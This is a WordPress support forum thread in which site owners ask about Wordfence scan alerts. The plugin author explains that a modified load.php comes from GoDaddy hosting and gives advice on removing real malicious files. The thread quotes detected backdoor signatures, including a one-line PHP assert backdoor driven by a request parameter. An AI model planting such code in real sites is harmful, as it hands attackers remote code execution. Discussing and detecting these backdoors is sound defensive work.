Support » Plugin: Wordfence Security - Firewall & Malware Scan » Scan has new problem: WordPress core file modified: wp-includes/load.php

  • Resolved gnc99

    (@gnc99)


    The Wordfence scan on my site had a new problem message today:
    “WordPress core file modified: wp-includes/load.php”.
    Filename: wp-includes/load.php
    File type: Core
    Issue first detected: 8 hours 1 min ago.
    Severity: Critical
    Status New
    This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.
    —————————
    I’ve made no modifications to that file. One of the options below the message was “Restore the original version of this file”.
    After I selected that option, the message returned was “An error occurred. We could not write to that file. You may not have permission to modify files on your WordPress server.”

    I’m one of two administrators (the only administrator on the site), neither of us has touched that file so seems something else has been changed. Is this a known malware scenario? How do I go about cleaning/fixing? My site is www.

Viewing 15 replies - 1 through 15 (of 21 total)
  • Having the same problem as @gnc99!

    Also getting this notification:

    Wordfence found the following new issues on ”
    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas01_data02/21/2880721/html/wp-content/object-cache.php on line 664

    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas01_data02/21/2880721/html/wp-content/object-cache.php on line 664
    Bree Brouwer”.

    Von

    (@vondielozano)

    Also getting this notification on my site:

    WordPress core file modified: wp-includes/load.php

    When I click “view activity file”:

    Indirect modification of overloaded element of WP_Hook has no effect in <b>/home/content/p3pnexwpnas05_data01/11/2273111/html/wp-content/object-cache.php</b> on line <b>664</b>

    Is this a hack? It doesn’t look like one. Here’s the code difference with the repository (added)

    483 global $wp_filter;
    484 // Re-initialize any hooks added manually by object-cache.php
    485 if ( $wp_filter ) {
    486 $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );
    487 }

    wp-includes/load.php

    Subscribing to this thread. I’ve seen this file warning and other files too, on a recent scan. All plugins are up to date, WP versions updated and FTP and WP passwords are very strong.

    This one file:

    Filename:
    wp-load.php

    File type:
    Core

    Issue first detected:
    19 mins ago.

    Severity:
    Critical
    Status
    New
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.

    • This reply was modified 2 years, 11 months ago by LMD99.
    • This reply was modified 2 years, 11 months ago by LMD99. Reason: add

    Add – I uploaded a new version of wp-load.php right from a recently downloaded version of WP 4.7. I renamed the suspect file on the server to: wp-load-old.php. I then uploaded the new file, wp-load.php, did another scan and found that both files were tagged as malicious.

    Both the new and original file on the server have the same malicious code:

    The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.

    Following

    Following

    Hi
    I have the same problem since the update to 4.7 of wordpress and i asked my hosting service, Godaddy (managed wordpress) about those changes and sent them the report generated by Wordfence and sent to my email and they told me that those files were changed by Godaddy, they are not result of hacking, are some measure to prevent problems. It might happen the same with you.

    @fatimajesus, how many files are you referring to? I know this thread started with one file being an issue, but WF has flagged a few dozen in my latest scan as having malicious code.

    Same issue. Following.

    • This reply was modified 2 years, 11 months ago by katiesutton.
    Plugin Author WFMattR

    (@wfmattr)

    Hi all,

    It looks like “wp-includes/load.php” is modified by GoDaddy on Managed WordPress hosting packages. If that is the only file being modified and you have only the same modifications that @zerojack mentioned, your site should be ok. (Note that Managed WordPress plans on GoDaddy prevent you from modifying your own site’s WP core files, so you cannot replace the file with the original version if you try.)

    A couple people also mentioned this message, which can be related:
    Notice: Indirect modification of overloaded element of WP_Hook
    That appears to be an issue on GoDaddy hosts after updating to WordPress 4.7 in their custom “object-cache.php” file. Wordfence and other plugins use WordPress’s built-in object cache. If you’re seeing this message, GoDaddy should be able to help. A temporary fix is to add this line to your wp-config.php file, just after the WP_DEBUG line — this prevents error messages from being displayed on the page, even if the underlying issue still occurs, so that regular visitors will not see the message:
    define('WP_DEBUG_DISPLAY', false);

    @lmd99: I think your site’s issue is different — “gzpdecode.php” is likely to be a real malicious file, being included from other files. There is a normal file named “gzdecode.php” (“gz…” rather than “gzp…”). We have a guide for cleaning hacked sites here: How to clean a hacked website

    Again, just to clarify — for anyone who only has the first two issues, they are not a sign of a hack, but only the “gzpdecode.php” issue mentioned above would be.

    -Matt R

    Plugin Author WFMattR

    (@wfmattr)

    Update: It looks like GoDaddy may not need to fix the “Notice: Indirect modification …” message — another plugin author says this should be fixed in WP 4.7.1, and there is a trac item open that looks to be related:

    https://wordpress.org/support/topic/overloaded-elemet-of-wp_hook/
    https://core.trac.wordpress.org/ticket/39132

    -Matt R

    Hey Matt – thanks for your reply. What about this file notice? Its one of many that are flagged as problematic, but before I get to notifying the site owner of the issue, then asking you guys to look into it (for a fee, yes I know), what can you tell us here? Is this example below an issue, false positive or what?

    File appears to be malicious: wp-includes/pomo/index.php

    Filename:
    wp-includes/pomo/index.php

    File type:
    Not a core, theme or plugin file.

    Issue first detected:
    4 hours 35 mins ago.

    Severity:
    Critical

    Status
    New
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if(isset($_REQUEST[‘bot’])) assert(stripslashes($_REQUEST[bot]));”. The infection type is: Backdoor:PHP/botrequest.

    Can these files just be removed? “this file appears to be installed by a hacker…”

    • This reply was modified 2 years, 11 months ago by LMD99. Reason: add
    Plugin Author WFMattR

    (@wfmattr)

    Hi LMD99,

    Yes, that does appear to be a malicious file. It is usually ok to remove malicious files that aren’t identified as a part of WordPress core plugins, or themes (especially if located in wp-includes or wp-admin) — but be careful if you have any premium plugins/themes on the site, since they can’t be matched to known files. If you have suspicious files in a plugin/theme folder, it is often easiest to remove and reinstall the plugin or theme.

    In some cases, there may be modified files that use PHP’s “require” keyword to load the malicious files, so if removing a file causes the site to stop working, you would need to find where it was being loaded from. (It should be visible in the site’s error log on most hosts.)

    I recommend making sure you also have a backup of the site before removing files, just in case you need to restore a file — even though the backup will contain the malicious files, it will also have copies of all the good files, in case you need them.

    -Matt R

    Following.
    WordPress core file modified: wp-includes/load.php

    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas13_data01/82/3090882/html/wp-content/object-cache.php on line 664

    I see GoDaddy mentioned, and I host on MediaTemple which is also now a GoDaddy company if I’m correct. Since we cannot modify core files, I assume we wait for our host to recognize and fix the cause of this error?

Viewing 15 replies - 1 through 15 (of 21 total)
  • The topic ‘Scan has new problem: WordPress core file modified: wp-includes/load.php’ is closed to new replies.